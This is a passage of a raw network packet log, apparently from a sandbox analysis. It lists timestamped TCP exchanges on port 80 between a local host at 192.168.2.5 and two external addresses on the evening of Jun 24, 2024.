Jun 24, 2024 00:10:22.224514008 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.224533081 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.224545002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.224581003 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.225496054 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225519896 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225534916 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225541115 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.225579023 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.225615025 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225626945 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225636959 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225647926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225662947 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.225696087 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.225704908 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225727081 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225749016 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.225776911 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225783110 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.225788116 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225819111 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.225869894 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225882053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225893021 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225904942 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.225917101 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.225939989 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226005077 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226016045 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226027012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226037979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226043940 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226049900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226088047 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226150990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226164103 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226175070 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226192951 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226218939 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226669073 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226713896 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226753950 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226764917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226785898 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226802111 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226803064 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226815939 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226828098 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226833105 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226838112 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226870060 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226874113 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226885080 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226896048 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226906061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226906061 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226917028 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.226932049 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.226960897 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227016926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227030993 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227061033 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227096081 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227125883 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227135897 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227147102 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227169037 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227204084 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227221012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227231979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227242947 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227255106 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227264881 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227269888 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227276087 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227308035 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227324009 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227344990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227389097 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227397919 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227410078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227443933 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227478981 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227490902 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227502108 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227513075 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227519989 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227524042 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227541924 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227577925 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227679968 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227691889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227703094 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227715015 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227724075 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227726936 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227740049 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.227744102 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227780104 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.227809906 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.240541935 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.240567923 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.240578890 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.240592003 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.240670919 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.240683079 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.240694046 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.240704060 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.240710974 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.240710974 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.240742922 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.240757942 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.240804911 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.242714882 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.242763996 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.242845058 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.242856979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.242892981 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.242902040 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.242913008 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.242923021 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.242933035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.242942095 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.242984056 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.243016958 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.243027925 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.243063927 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.243122101 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.243130922 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.243141890 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.243153095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.243161917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.243172884 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.243174076 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.243185043 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.243202925 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.243240118 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.264218092 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264230013 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264240980 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264308929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264309883 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264324903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264338970 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264348984 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264353991 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264391899 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264417887 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264437914 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264448881 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264457941 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264467001 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264477968 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264508009 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264539003 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264560938 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264610052 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264621973 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264626980 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264631033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264636993 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264646053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264652014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264667988 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264699936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264730930 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264813900 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264825106 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264836073 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.264869928 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.264906883 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.270579100 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.270597935 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.270606995 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.270663977 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.270663977 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.270715952 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.270728111 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.270745039 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.270760059 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.270770073 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.270771027 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.270787954 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.270826101 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271186113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271225929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271236897 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271239996 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271269083 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271281958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271294117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271297932 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271343946 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271343946 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271497965 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271509886 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271519899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271532059 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271543026 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271552086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271553040 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271593094 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271595955 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271610022 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271619081 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271624088 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271636009 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271639109 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271647930 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271684885 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271684885 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271713018 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271855116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271866083 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271877050 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271893978 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271905899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271910906 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271917105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271949053 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.271954060 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271965981 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.271969080 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272008896 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272047043 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272058010 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272068024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272079945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272099018 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272131920 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272161961 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272403955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272443056 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272454023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272456884 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272506952 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272506952 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272542000 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272553921 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272563934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272573948 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272595882 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272628069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272720098 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272731066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272742033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272757053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272773981 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272824049 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272824049 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272869110 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272880077 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272890091 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272913933 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272921085 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272927046 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272939920 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272945881 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272950888 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272963047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272974014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272984982 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.272988081 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.272996902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.273008108 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.273026943 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.273045063 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.273188114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.273205996 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.273224115 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.273235083 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.273238897 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.273247004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.273277998 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.273323059 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.284133911 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284153938 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284163952 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284212112 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.284248114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284249067 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.284265995 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284291029 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284296036 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.284301996 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284315109 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284315109 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.284324884 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284337044 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.284375906 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.284461975 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284472942 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284488916 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284499884 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284519911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.284548998 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.284558058 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284569979 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.284607887 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.285876036 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.285933018 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.285936117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.285948038 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.285984039 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.286010981 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.286027908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286039114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286048889 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286058903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286081076 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.286129951 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.286161900 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.286825895 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286835909 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286883116 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.286915064 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286926031 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286936045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286947966 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.286967993 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.286997080 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.287045002 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.287055969 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.287098885 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.310095072 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310132027 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310142040 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310156107 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310184956 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310209990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310220957 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310231924 CEST	80	49725	77.91.77.81	192.168.2.5
